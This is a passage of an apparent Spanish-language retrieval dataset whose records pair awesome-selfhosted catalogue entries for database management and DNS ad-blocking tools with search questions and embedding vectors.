-0.02746, 0.0132, -0.05799, 0.11503, -0.07982, 0.00411, -0.03995, 0.09342, -0.12591, 0.01966, 0.05764, 0.03786, 0.08559, 0.03371, -0.04639, 0.03222, -0.07232, -0.10427, 0.12033, -0.08014, 0.04347, -0.02334, 0.10601, 0.06893, -0.00086, 0.11566, 0.00916, -0.06285, 0.03266, 0.01576, 0.06319, -0.0271, 0.1143, 0.01736, -0.00625, 0.09509, 0.0617, 0.04987, 0.10344, -0.0142, -0.0707, -0.00714, -0.00086, 0.0148, -0.06747, -0.03996, 0.05105, 0.00524, -0.08538, -0.04634, 0.00921, -0.03068, -0.02462, 0.00317, -0.07913, -0.01282, 0.02778, 0.09302, -0.00091, 0.03129, 0.0322, 0.01455, 0.04851, -0.0715, -0.11356, -0.12046, -0.0339, 0.04516, 0.00829, -0.00634, 0.02472, 0.01661, 0.03066, 0.01205, 0.07328, -0.00978, 0.11446, -0.07016, 0.047, -0.0025, -0.06341, -0.01151, -0.04004, -0.00096, 0.02039, 0.09923, -0.06064, 0.00744, -0.04101, -0.02631, -0.01301, 0.11274, 0.03843, -0.03004, 0.01815, 0.04179, -0.02207, -0.01675, 0.00079, 0.00533, 0.06621, 0.01865, -0.0186, 0.03827, 0.04042, -0.1018, 0.02902, -0.04754, 0.00383, -0.06273, 0.07407, -0.04148, 0.03905, 0.00342, -0.08166, 0.00109, -0.03347, -0.0927, -0.0185, -0.05654, -0.05813, 0.02057, 0.03498, 0.04838, -0.06759, -0.06376, 0.03144, -0.03068, -0.05153, -0.06414, -0.0065, -0.02637, -0.05278, -0.01781, -0.00986, -0.0464, -0.02186, 0.02731, -0.03607, 0.02848, 0.03189, 0.01855, 0.01494, -0.01616, 0.05603, 0.02411, -0.03704, -0.02524, 0.05418, -0.01336, -0.04658, -0.0127, 0.03009, 0.01252, 0.04525, -0.014, -0.0202, 0.04945, 0.10434, 0.04124, -0.01064, 0.0115, -0.01367, 0.00763, 0.00261, -0.04631, 0.01982, 0.01283, -0.00835, 0.01559, -0.04515, -0.08243, 0.03649, 0.08085, -0.03223, -0.07536, -0.0236, -0.05767, -0.12569, 0.02947, 0.04348, -0.07623, -0.06874, 0.07127, 0.03841, -0.05184, 0.03661, -0.01877]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: d9 β€” Turn SQL databases into secure APIs through an intuitive admin interface. Data platform and headless CMS (fork of Directus) [GPL-3.0, Nodejs]. Databunker β€” Network-based, self-hosted, GDPR compliant, secure database for personal data or PII [MIT, Docker]. Datasette β€” Explore and publish data with easy import and export and database management [Apache-2.0, Python/Docker]. Evidence β€” Code-based BI tool. Write reports using SQL and markdown and they render as a website [MIT, Nodejs]. LibreDB Studio β€” Browser-based SQL IDE for PostgreSQL, MySQL, Oracle, SQL Server, SQLite, MongoDB and Redis, with an optional AI assistant that writes SQL from natural language (alternative to DataGrip, DBeaver) [MIT, Docker/K8S]. Limbas β€” Database framework for creating database-driven business applications. As a graphical database frontend, it enables the efficient processing of data stocks and the flexible development of comfortable database applications [GPL-2.0, PHP].", "indexar": "con quΓ© puedo montar un sistema de base de datos seguro para manejar datos personales bajo GDPR?", "v": [-0.07055, -0.04167, -0.07205, -0.19899, -0.04103, 0.02055, 0.03825, 0.01053, -0.16651, -0.07363, 0.00764, -0.12623, -0.01804, -0.13075, 0.00927, -0.06075, 0.07024, -0.09002, -0.09212, -0.00496, 0.0096, -0.07127, 0.09729, -0.18751, -0.10249, -0.07801, 0.06056, -0.05031, -0.16046, 0.10903, 0.08486, -0.02857, -0.1252, -0.01937, -0.13223, 0.04668, -0.03577, 0.08191, 0.00092, -0.10777, 0.02297, -0.05223, 0.00477, 0.1301, 0.08963, 0.00227, 0.03288, 0.01216, 0.07209, -0.14522, -0.05615, 0.10536, -0.00904, -0.08238, -0.03782, -0.00903, 0.09174, -0.08482, 0.09557, 0.04165, -0.08838, 0.07882, 0.00955, 0.11873, -0.08765, 0.00164, 0.09886, -0.01205, -0.04154, 0.09748, 0.00958, -0.02509, -0.04332, -0.04347, 0.00343, -0.10414, 0.13017, 0.04451, 0.02093, 0.13187, -0.07403, 0.05056, -0.04716, 0.03809, -0.04873, 0.04747, 0.08809, -0.02035, -0.06103, -0.05377, 0.13206, 0.09053, -0.07485, 0.01603, 0.04709, 0.0283, 0.04271, -0.03796, -0.12077, -0.07375, -0.04848, 0.05352, 0.00253, 0.10771, 0.01991, 0.02086, 0.0785, 0.02765, 0.03678, -0.09105, -0.07167, 0.0517, -0.09225, -0.04862, 0.08365, -0.04552, -0.0372, 0.00162, 0.0138, 0.03649, 0.04996, -0.0289, 0.05212, -0.03358, 0.07517, -0.02232, -0.03325, 0.12, -0.06605, 0.07696, 0.00931, -0.00729, -0.08929, 0.04567, 0.08284, 0.08876, -0.1203, -0.04695, 0.01876, 0.00199, 0.01094, 0.03393, -0.05935, -0.01783, 0.0366, -0.05567, 0.07073, 0.06243, -0.01541, -0.00732, 0.03367, 0.06333, 0.00109, -0.00013, -0.03674, 0.018, 0.04158, -0.12295, 0.03658, 0.02872, 0.02298, 0.07236, -0.01473, 0.0798, 0.0167, -0.01686, 0.06916, -0.03856, 0.08909, 0.07792, -0.02359, 0.05107, 0.09573, -0.06008, 0.07173, -0.00837, -0.06741, -0.06736, -0.00658, -0.02401, 0.04463, 0.00333, 0.07689, -0.00338, 0.0019, -0.00991, 0.00742, -0.0328, 0.00057, -0.00469, -0.03074, 0.11851, 0.03287, -0.00167, 0.0402, -0.07433, -0.02112, 0.03149, 0.04456, 0.01537, -0.01981, 0.04513, -0.0153, 0.02242, -0.00566, 0.05414, -0.00112, -0.01915, 0.0537, -0.06947, 0.01037, -0.0041, 0.04618, -0.04295, -0.06167, -0.00682, -0.03479, -0.00553, 0.0031, -0.00424, -0.06497, 0.03339, 0.03948, -0.0348, -0.09193, -0.01647, 0.00065, -0.00705, -0.01551, -0.03209, -0.00898, -0.00999, 0.01179, 0.00059, 0.06154, 0.00803, -0.04233, 0.00056, -0.02116, -0.0784, 0.04074, 0.06641, -0.01409, -0.05507, -0.0109, -0.04427, -0.05662, 0.05994, 0.00513, -0.06582, -0.02295, -0.05451, -0.02674, -0.02218, -0.05185, -0.04162]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Mathesar β€” Intuitive UI to manage data collaboratively, for users of all technical skill levels. Built on Postgres – connect an existing DB or set up a new one [GPL-3.0, Docker/Python]. OrcaQ β€” Modern database client and IDE for managing, querying, and exploring multiple database types with built-in AI assistant [MIT, Nodejs/deb/Docker]. StackRender β€” Database schema design and SQL migration generator supporting PostgreSQL, MySQL, MariaDB, SQLite, SQL Server, and Oracle [AGPL-3.0, Nodejs/Docker].", "indexar": "que programa sirve para gestionar datos colaborativamente desde una interfaz intuitiva?", "v": [0.11938, 0.08213, -0.17393, -0.2407, 0.19214, -0.16753, 0.00237, -0.01959, -0.1015, -0.01585, 0.00516, -0.14078, 0.00275, -0.03693, -0.00043, 0.08743, 0.18929, -0.14515, -0.03787, -0.04474, -0.02711, 0.07257, 0.00814, -0.0809, -0.10101, -0.05875, -0.0003, -0.10815, 0.02304, 0.01968, 0.02429, -0.10763, 0.04753, -0.05308, -0.03909, 0.01117, -0.04207, 0.00881, 0.05075, -0.0784, -0.00725, 0.02179, -0.09653, 0.07306, 0.17418, 0.06484, -0.05416, -0.02831, 0.00892, 0.04438, -0.12205, -0.06436, 0.00756, -0.02587, -0.00096, -0.0532, 0.0544, -0.20959, 0.00386, -0.01671, -0.08627, 0.06786, -0.05666, 0.04144, 0.04061, -0.0261, 0.06438, -0.00149, -0.01698, 0.1625, -0.02276, 0.13665, -0.01482, -0.10962, 0.07015, -0.00302, 0.06699, 0.0834, 0.05823, -0.01394, 0.06129, 0.00101, 0.00055, 0.02461, 0.02299, 0.01507, 0.13547, -0.04947, -0.03411, 0.00486, 0.0078, 0.02288, 0.01681, -0.04253, 0.09315, 0.05125, 0.069, -0.01976, 0.0393, 0.01209, 0.03202, -0.0272, -0.13629, 0.05725, -0.00398, 0.14557, 0.03986, -0.01144, -0.08699, 0.03131, 0.04351, 0.01037, 0.03809, -0.03542, -0.01528, 0.00774, 0.01388, -0.01286, 0.05253, -0.03001, -0.04145, -0.05294, -0.01635, -0.00656, 0.07353, -0.0313, -0.02027, 0.09227, 0.05192, 0.04936, -0.07067, 0.00157, -0.02356, -0.00761, 0.01046, 0.01186, -0.09661, 0.00119, 0.00448, -0.11916, 0.01667, 0.1053, 0.03684, 0.01467, 0.02842, -0.05306, 0.05514, -0.01446, 0.0538, 0.07169, 0.08042, -0.02265, -0.02335, 0.06352, -0.06945, 0.00633, 0.01753, -0.04558, -0.12415, 0.00777, -0.03356, -0.01056, -0.04249, 0.05417, 0.06032, -0.09442, -0.03121, 0.04265, 0.0879, 0.08372, -0.01821, 0.0772, 0.0788, -0.08409, -0.00211, 0.02489, -0.04979, -0.13801, 0.01759, -0.05453, -0.02565, -0.01881, 0.06323, 0.00681, -0.02312, -0.03339, -0.05342, 0.01134, -0.036, -0.03549, 0.01974, 0.11248, 0.0415, -0.03446, 0.04854, -0.04313, -0.00731, 0.02769, 0.00623, -0.00956, 0.01189, 0.03694, 0.00944, 0.01523, -0.0017, 0.10597, -0.01161, 0.02584, 0.09264, 0.05252, -0.04496, -0.0134, 0.04448, 0.02252, -0.04924, -0.03399, 0.01841, 0.00991, 0.03436, -0.01088, -0.04499, -0.02252, 0.03929, -0.01205, 0.02029, -0.04381, 0.05985, 0.046, -0.00058, -0.02031, -0.00066, -0.02228, 0.02299, -0.01069, 0.00086, -0.03932, 0.01015, -0.05633, -0.01139, -0.09976, 0.00082, 0.03634, -0.00825, -0.06155, -0.00241, -0.05378, -0.07423, 0.01365, 0.01721, -0.03553, -0.06342, 0.01794, 0.0576, 0.00132, 0.01812, 0.00012]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Mathesar β€” Intuitive UI to manage data collaboratively, for users of all technical skill levels. Built on Postgres – connect an existing DB or set up a new one [GPL-3.0, Docker/Python]. OrcaQ β€” Modern database client and IDE for managing, querying, and exploring multiple database types with built-in AI assistant [MIT, Nodejs/deb/Docker]. StackRender β€” Database schema design and SQL migration generator supporting PostgreSQL, MySQL, MariaDB, SQLite, SQL Server, and Oracle [AGPL-3.0, Nodejs/Docker].", "indexar": "con que puedo conectar mi base de datos existente sin saber mucho de cΓ³digo?", "v": [-0.09437, 0.1166, -0.21676, -0.06442, -0.05449, -0.16352, -0.05531, 0.03174, -0.18246, -0.11771, -0.10381, -0.23553, -0.0546, -0.10001, 0.04563, 0.00131, 0.12333, -0.09927, -0.00854, -0.09794, 0.05504, -0.06058, -0.04008, -0.05225, -0.04811, 0.05398, 0.03134, 0.04205, -0.1185, 0.00092, 0.04167, -0.04183, -0.00684, 0.11694, -0.03948, 0.04608, 0.02892, 0.15523, -0.04252, -0.03093, -0.04972, 0.00982, 0.00113, 0.09926, 0.08812, -0.00071, -0.01921, 0.00212, 0.04899, -0.01224, -0.1423, 0.00899, -0.15665, -0.12034, -0.08608, -0.08267, 0.07583, -0.02808, 0.05546, 0.05304, -0.01134, -0.04807, 0.00209, -0.04438, 0.01406, 0.01665, 0.11959, 0.0446, -0.10649, 0.10814, 0.00282, 0.0923, -0.14995, -0.07094, 0.09032, 0.04244, 0.10914, -0.10974, 0.02935, 0.1192, -0.03088, -0.02026, -0.04123, -0.02181, 0.00507, 0.00832, 0.00847, -0.02911, -0.00012, -0.07414, 0.1018, 0.03037, -0.05154, 0.05551, 0.06102, 0.03754, -0.05509, -0.01252, 0.0007, 0.01955, 0.02845, 0.06091, 0.00626, 0.10778, 0.14881, 0.00846, 0.13794, -0.02672, -0.00616, 0.02652, -0.10094, -0.06767, -0.09495, -0.10749, -0.05882, -0.04146, -0.0707, 0.0066, -0.03782, 0.00664, -0.0668, 0.00352, 0.00979, 0.02905, -0.00787, 0.04733, -0.04041, 0.11205, 0.04331, 0.04695, -0.05003, 0.03745, -0.01086, -0.06851, 0.0937, 0.09653, -0.01445, -0.01913, 0.01458, -0.00966, -0.01963, 0.03835, -0.01488, 0.10347, 0.01536, 0.00961, -0.03254, 0.02289, -0.10942, -0.02548, -0.0341, 0.07673, -0.04701, 0.06936, -0.05486, 0.04761, 0.07006, -0.00948, 0.01531, -0.01621, -0.01024, 0.07479, -0.05137, -0.03847, 0.03071, -0.04515, -0.00728, -0.00535, 0.04801, 0.06361, -0.03074, 0.04496, 0.07696, -0.04502, 0.0448, -0.02018, -0.04585, -0.06063, -0.06578, -0.01599, 0.00566, 0.00133, 0.04339, -0.05155, 0.00337, 0.04367, 0.024, 0.01372, -0.02653, -0.01431, 0.01294, 0.04046, 0.06776, -0.0038, 0.03274, -0.0796, 0.04049, -0.01869, 0.02506, -0.03018, -0.06047, 0.09393, 0.0059, 0.01093, 0.01831, 0.04146, -0.0054, -0.04194, 0.0068, -0.02141, 0.03714, -0.03778, 0.0826, -0.04223, -0.03926, 0.00314, 0.02327, 0.01145, 0.08337, 0.00235, -0.0241, 0.04967, 0.01195, -0.02249, -0.02768, -0.04323, -0.01324, 0.00339, 0.03209, -0.0004, -0.0184, -0.00569, 0.03383, -0.01173, 0.03684, 0.01579, -0.08658, -0.05425, -0.07169, -0.04787, 0.02344, 0.06127, -0.01636, -0.05963, 0.01838, 0.00478, -0.09077, 0.01433, -0.03495, -0.05757, -0.00732, -0.03017, 0.05069, -0.04393, 0.00427, 0.01503]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Mathesar β€” Intuitive UI to manage data collaboratively, for users of all technical skill levels. Built on Postgres – connect an existing DB or set up a new one [GPL-3.0, Docker/Python]. OrcaQ β€” Modern database client and IDE for managing, querying, and exploring multiple database types with built-in AI assistant [MIT, Nodejs/deb/Docker]. StackRender β€” Database schema design and SQL migration generator supporting PostgreSQL, MySQL, MariaDB, SQLite, SQL Server, and Oracle [AGPL-3.0, Nodejs/Docker].", "indexar": "cual es la mejor herramienta para diseΓ±ar esquemas de bases de datos y generar migraciones SQL?", "v": [0.01558, -0.05727, -0.15462, -0.18702, 0.05367, -0.14603, -0.08269, -0.08851, -0.07678, -0.04665, -0.08031, -0.0581, -0.04913, -0.18953, 0.09388, 0.03591, 0.07245, -0.10712, -0.10789, 0.00016, 0.05203, -0.03507, 0.02478, -0.0469, -0.19565, -0.10384, 0.05281, -0.00739, -0.13526, 0.0976, 0.01776, 0.00085, 0.05019, -0.05863, 0.00168, -0.01884, -0.06689, 0.10186, -0.03803, -0.11622, -0.06569, 0.0265, -0.1459, 0.04395, 0.03365, -0.06191, -0.03971, 0.01434, -0.03297, -0.04884, -0.09676, -0.01319, -0.0847, -0.05605, 0.00054, -0.0532, 0.18821, -0.12828, 0.07309, 0.0714, -0.10104, 0.03459, 0.00712, -0.02105, -0.02075, -0.06322, -0.04056, -0.06957, -0.03953, 0.10417, -0.00731, 0.09855, 0.00496, -0.0482, 0.07782, 0.00719, 0.0751, -0.00196, 0.03032, 0.0625, -0.03465, -0.04697, -0.13535, 0.11581, -0.04406, -0.04307, 0.05456, 0.01034, -0.0373, -0.03329, 0.04714, -0.038, 0.0214, 0.00952, -0.01118, -0.01079, 0.03488, -0.08556, 0.07324, 0.06705, -0.03388, -0.06635, -0.07641, 0.12885, 0.02644, 0.07664, 0.11367, 0.0205, -0.05902, -0.00158, -0.01747, 0.00833, -0.03613, -0.02923, 0.01664, -0.07379, -0.03147, -0.02206, 0.02189, -0.0233, 0.05075, -0.00829, -0.04856, -0.01951, 0.02544, -0.05882, -0.03454, 0.06489, 0.02495, -0.00249, -0.02633, -0.03894, -0.12842, 0.05216, -0.00918, 0.06315, -0.00664, -0.15057, 0.02606, -0.11308, -0.0127, 0.06402, -0.02131, -0.05139, -0.02422, 0.04124, 0.06466, 0.02079, -0.1016, 0.04061, -0.01664, 0.03998, 0.11427, -0.0002, -0.11402, 0.04656, -0.04117, -0.03692, -0.09168, 0.05448, -0.0005, 0.05831, 0.00691, 0.01275, 0.04974, -0.0691, 0.06632, 0.01379, 0.06215, 0.04512, 0.05165, 0.0319, 0.06158, -0.06638, 0.01802, -0.05332, -0.11272, -0.11321, -0.04888, -0.07631, -0.0218, 0.03137, -0.03319, -0.04738, 0.00957, -0.05743, 0.03753, 0.01062, 0.03643, 0.00144, -0.01892, 0.08626, 0.00833, -0.04652, 0.03249, -0.05875, -0.00474, -0.03311, 0.06799, -0.04447, -0.05033, 0.00753, 0.01925, -0.06632, 0.01862, 0.10748, -0.05502, 0.0051, 0.01395, 0.03153, 0.00967, -0.05969, -0.00231, -0.04359, -0.0305, -0.01836, 0.04119, -0.00454, 0.05507, 0.01582, -0.03922, 0.06756, 0.03335, -0.02678, -0.05622, 0.01276, 0.03585, 0.00969, 0.01277, 0.01258, 0.03289, 0.00364, 0.01401, 0.00387, 0.02816, -0.00719, -0.01693, -0.05421, -0.0177, -0.11186, 0.04391, 0.07678, -0.0449, -0.05841, 0.01738, -0.04643, -0.05425, 0.03134, 0.00962, -0.11332, -0.06291, 0.0087, 0.05081, -0.059, 0.03296, -0.0508]} -{"tipo": "pregunta", "herramienta": "DNS", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / DNS", "tema": "dns", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / DNS: AdGuard Home β€” User-friendly ads & trackers blocking DNS server [GPL-3.0, Docker]. blocky β€” Fast and lightweight DNS proxy as ad-blocker for local network with many features (alternative to Pi-hole) [Apache-2.0, Go/Docker]. Maza ad blocking β€” Local ad blocker. Like Pi-hole but local and using your operating system [Apache-2.0, Shell]. Numa β€” Ad-blocking DNS resolver with DNSSEC-validating recursive resolution, DoH/DoT/Oblivious DoH, ephemeral overrides, and local service domains, in a single Rust binary (alternative to Pi-hole, AdGuard Home, NextDNS) [MIT, Rust/Docker/Nix]. Pi-hole β€” Blackhole for Internet advertisements with a GUI for management and monitoring [EUPL-1.2, Shell/PHP/Docker]. Technitium DNS Server β€” Authoritative/recursive DNS server with ad blocking functionality [GPL-3.0, Docker/C#].", "indexar": "que herramienta sirve para bloquear anuncios en el nivel DNS local?", "v": [0.10039, 0.02192, -0.12722, -0.2146, 0.02911, -0.06128, -0.09114, -0.04379, -0.11446, 0.00522, 0.00772, -0.20172, -0.04198, -0.21307, -0.03616, -0.00406, 0.01527, -0.13141, 0.02498, 0.0629, -0.10538, -0.08703, -0.10062, 0.09739, -0.037, -0.107, -0.05572, -0.0123, -0.26168, 0.04512, -0.04723, -0.11924, -0.01363, 0.00323, 0.00824, -0.04063, -0.02091, 0.03588, 0.06243, -0.02251, 0.05373, -0.0011, -0.09761, 0.02227, -0.07821, -0.01529, 0.03703, -0.00966, 0.07593, -0.07209, -0.08049, -0.11973, -0.12034, -0.0153, 0.00816, 0.01193, 0.2193, -0.06867, -0.03315, -0.08201, -0.18284, -0.15378, -0.0217, -0.06378, 0.06207, -0.03833, 0.05843, -0.01635, -0.06763, 0.01535, -0.00672, -0.00493, 0.14412, -0.03394, 0.06418, 0.03013, 0.03928, 0.03086, 0.12014, -0.03397, 0.10587, -0.04739, -0.0487, 0.12218, -0.09959, -0.00193, -0.05166, -0.10363, -0.0359, -0.17052, 0.07907, 0.147, 0.00918, 0.02488, 0.07476, 0.03423, 0.11286, 0.04893, -0.03678, -0.04163, 0.15666, -0.03944, -0.07492, 0.06394, 0.00035, -0.01823, 0.0363, -0.07012, 0.04376, 0.02109, 0.0641, 0.00804, -0.04228, -0.04316, -0.04026, 0.06098, -0.0096, -0.00045, 0.03786, -0.03275, -0.04898, -0.04355, -0.06467, 0.0235, -0.01582, 0.06687, -0.03657, -0.0297, -0.01136, -0.04198, 0.00467, -0.0079, -0.03357, -0.04153, -0.04386, 0.02056, 0.04686, -0.10087, -0.00068, -0.04711, 0.05855, 0.01523, -0.01096, -0.07295, 0.05195, -0.01016, 0.0377, -0.02016, -0.06127, 0.00728, 0.02006, -0.08129, -0.01387, 0.0097, -0.06841, -0.0336, -0.03314, -0.02594, -0.01312, 0.11788, -0.063, -0.01724, 0.00325, 0.06516, -0.02043, 0.00168, -0.04827, 0.01818, 0.07188, 0.01821, -0.0055, 0.02735, 0.0556, -0.06938, 0.015, -0.0249, 0.00371, 0.00839, 0.00175, -0.02935, 0.01219, -0.03931, -0.00614, 0.032, -0.02116, 0.00399, 0.04787, -0.04609, -0.01948, 0.03101, -0.01535, 0.02538, -0.06374, -0.01812, -0.0189, -0.02457, -0.03312, -0.11698, 0.02253, 0.01097, -0.02094, -0.07347, -0.00376, -0.0245, -0.03943, 0.04091, -0.00953, 0.00475, -0.03364, 0.02797, -0.00191, -0.03927, -0.00568, 0.01736, -0.00739, -0.01319, -0.00185, -0.03757, -0.03988, 0.01729, -0.01381, 0.02023, 0.00984, -0.02748, 0.00948, -0.02746, 0.02835, -0.03037, 0.0341, 0.04588, 0.01851, -0.00448, -0.00361, 0.03489, 0.01274, -0.02802, 0.01399, -0.03237, -0.01269, -0.03862, -0.05165, 0.01155, -0.00883, -0.02768, -0.01488, -0.06367, 0.00228, -0.01925, 0.00941, -0.06607, -0.02185, -0.00962, 0.05947, 0.00693, 0.02998, 0.03767]} -{"tipo": "pregunta", "herramienta": "DNS", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / DNS", "tema": "dns", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / DNS: AdGuard Home β€” User-friendly ads & trackers blocking DNS server [GPL-3.0, Docker]. blocky β€” Fast and lightweight DNS proxy as ad-blocker for local network with many features (alternative to Pi-hole) [Apache-2.0, Go/Docker]. Maza ad blocking β€” Local ad blocker. Like Pi-hole but local and using your operating system [Apache-2.0, Shell]. Numa β€” Ad-blocking DNS resolver with DNSSEC-validating recursive resolution, DoH/DoT/Oblivious DoH, ephemeral overrides, and local service domains, in a single Rust binary (alternative to Pi-hole, AdGuard Home, NextDNS) [MIT, Rust/Docker/Nix]. Pi-hole β€” Blackhole for Internet advertisements with a GUI for management and monitoring [EUPL-1.2, Shell/PHP/Docker]. Technitium DNS Server β€” Authoritative/recursive DNS server with ad blocking functionality [GPL-3.0, Docker/C#].", "indexar": "cual es una alternativa libre a Pi-hole que funcione sin servidor dedicado?", "v": [-0.10443, 0.07357, -0.22388, -0.01376, -0.02115, -0.18884, 0.03208, -0.17281, -0.12044, -0.0334, 0.05263, -0.11402, 0.03593, -0.03219, 0.08957, -0.12399, 0.13567, -0.08204, 0.08226, -0.02211, -0.14987, 0.06964, 0.01733, -0.04562, -0.05455, -0.0353, 0.12502, 0.04028, -0.16987, -0.0546, 0.10801, -0.06799, 0.06836, -0.0699, 0.04387, -0.07788, 0.00758, 0.10483, -0.00355, 0.02787, 0.03262, -0.01435, -0.08282, 0.077, -0.09536, -0.05659, 0.07455, -0.00392, 0.10901, 0.13686, -0.09939, -0.02574, -0.09091, 0.01122, 0.0968, 0.02262, 0.1074, -0.11487, 0.07932, -0.01421, -0.12466, 0.04627, 0.02829, -0.1119, 0.09813, -0.04763, -0.03942, -0.08721, -0.08844, 0.01408, -0.04655, 0.04734, -0.00759, -0.0155, 0.00875, 0.07623, -0.04825, 0.01572, -0.03509, 0.05964, 0.03352, 0.00796, -0.02272, 0.04582, -0.06585, -0.05465, 0.06795, -0.09168, 0.06713, 0.04442, 0.0811, 0.07859, -0.06618, 0.18396, -0.01996, -0.08442, 0.07022, 0.06933, 0.04342, 0.00438, 0.18575, 0.09246, -0.11845, -0.00424, 0.0526, 0.04131, 0.05013, -0.01164, -0.00909, 0.03577, 0.03025, 0.00971, -0.04713, -0.02761, -0.05985, -0.09145, -0.04901, 0.00978, -0.01894, 0.03226, -0.05726, -0.0578, 0.04312, -0.03018, 0.0188, -0.00561, 0.00094, 0.00304, 0.00461, 0.01096, 0.00682, -0.02204, -0.07374, -0.01665, -0.0565, 0.01067, 0.11159, -0.01437, -0.05882, 0.01862, 0.01425, 0.02779, 0.01797, -0.01186, 0.09245, -0.02508, 0.05327, -0.08753, -0.06187, -0.002, -0.03928, -0.017, 0.00625, 0.07299, -0.09669, 0.03139, -0.02251, -0.03501, -0.02776, 0.08937, 0.06151, -0.00366, 0.04925, 0.05571, 0.00323, -0.01976, -0.03959, 0.01502, 0.02045, 0.02175, -0.02046, 0.06044, -0.00824, -0.08309, 0.04448, -0.08047, -0.03838, -0.091, 0.06513, -0.02314, -0.01937, -0.0235, -0.09267, -0.01161, -0.06268, -0.02158, 0.02343, -0.0268, 0.00428, 0.00091, 0.05041, -0.02104, -0.09226, -0.04237, 0.00336, -0.02404, -0.03566, -0.10084, 0.0088, -0.04385, -0.06696, -0.00229, -0.02286, -0.03072, -0.01906, 0.01376, -0.05513, 0.03908, 0.01418, 0.03764, 0.0481, -0.04488, 0.09679, 0.00323, -0.02736, 0.02376, 0.0744, -0.03115, 0.00907, -0.00279, 0.03425, 0.00029, 0.02925, 0.01763, -0.03373, 0.02752, 0.0295, 0.05094, 0.0421, 0.01061, -0.03485, 0.01596, -0.0552, 0.01453, 0.01272, 0.00997, 0.01709, 0.01077, -0.05223, -0.06287, 0.06101, 0.08095, -0.0007, -0.02917, -0.0313, -0.04806, -0.03851, -0.00324, -0.04335, -0.05901, 0.00176, 0.02604, 0.00382, -0.05788, 0.03783, -0.02561]} -{"tipo": "pregunta", "herramienta": "DNS", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / DNS", "tema": "dns", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / DNS: AdGuard Home β€” User-friendly ads & trackers blocking DNS server [GPL-3.0, Docker]. blocky β€” Fast and lightweight DNS proxy as ad-blocker for local network with many features (alternative to Pi-hole) [Apache-2.0, Go/Docker]. Maza ad blocking β€” Local ad blocker. Like Pi-hole but local and using your operating system [Apache-2.0, Shell]. Numa β€” Ad-blocking DNS resolver with DNSSEC-validating recursive resolution, DoH/DoT/Oblivious DoH, ephemeral overrides, and local service domains, in a single Rust binary (alternative to Pi-hole, AdGuard Home, NextDNS) [MIT, Rust/Docker/Nix]. Pi-hole β€” Blackhole for Internet advertisements with a GUI for management and monitoring [EUPL-1.2, Shell/PHP/Docker]. Technitium DNS Server β€” Authoritative/recursive DNS server with ad blocking functionality [GPL-3.0, Docker/C#].", "indexar": "como puedo montar un servidor de DNS que filtre trackers y anuncios", "v": [0.13212, 0.00764, -0.16208, -0.22257, -0.04497, 0.06288, -0.00099, -0.02507, -0.08052, 0.00707, -0.03018, -0.06854, 0.03263, -0.18884, -0.01393, -0.0003, 0.11892, -0.10192, 0.10736, 0.06912, -0.09881, -0.09262, -0.04164, 0.00547, -0.00167, -0.01919, 0.01646, -0.03891, -0.17516, 0.03808, 0.0227, -0.02898, 0.01498, 0.07666, 0.00841, -0.14214, -0.08095, 0.07967, 0.03033, -0.03366, 0.06878, -0.03805, -0.13562, 0.0228, -0.02892, -0.04546, 0.02226, -0.08183, 0.08745, -0.1497, -0.0328, -0.0305, -0.13013, 0.03155, -0.08664, -0.02715, 0.15832, -0.10288, 0.07582, -0.04777, -0.10649, 0.01701, 0.01344, 0.00212, 0.03795, -0.06412, 0.06723, -0.05828, -0.18293, -0.10028, 0.01969, -0.0322, 0.05879, -0.05506, 0.06656, 0.09751, 0.05367, -0.01935, 0.09292, 0.03671, 0.02218, -0.07821, -0.04386, 0.16588, -0.09929, 0.02275, -0.01525, -0.08906, -0.02986, -0.03974, 0.09194, 0.14863, -0.03227, 0.08349, 0.04231, 0.06346, 0.13025, 0.02939, -0.00816, 0.00274, 0.02726, 0.07794, -0.02883, 0.13381, 0.00144, 0.04548, 0.1003, -0.10854, 0.06433, -0.01386, 0.05096, -0.00214, -0.1082, -0.05919, 0.01302, -0.05468, -0.02393, 0.00905, 0.02319, 0.02638, -0.08571, -0.06524, -0.02349, 0.0269, 0.0508, -0.03375, 0.04619, -0.02937, -0.00436, -0.04189, 0.0749, 0.00061, -0.07563, -0.06701, -0.05257, 0.08738, 0.02257, -0.03948, -0.01524, -0.04114, 0.02179, -0.02287, -0.0235, -0.01032, 0.09068, 0.00451, 0.04306, -0.05778, -0.07767, 0.03124, 0.0284, 0.0172, -0.01841, -0.03209, -0.08432, -0.01458, 0.08624, -0.06841, 0.01564, 0.07697, -0.02269, 0.03834, 0.03023, 0.05314, 0.04641, 0.06681, -0.02583, 0.00976, 0.06976, 0.01857, -0.06056, 0.03138, 0.0324, -0.07447, 0.0716, -0.00178, -0.04604, -0.03936, 0.09844, 0.01921, 0.00757, 0.03069, 0.02674, 0.02885, -0.05681, -0.02863, -0.01936, -0.00311, -0.01034, 0.02975, 0.05479, 0.02505, -0.06392, 0.02173, 0.02506, -0.08364, -0.03473, -0.09447, 0.00744, 0.00643, -0.05551, -0.05988, -0.02682, -0.0082, -0.01301, -0.0387, -0.03757, 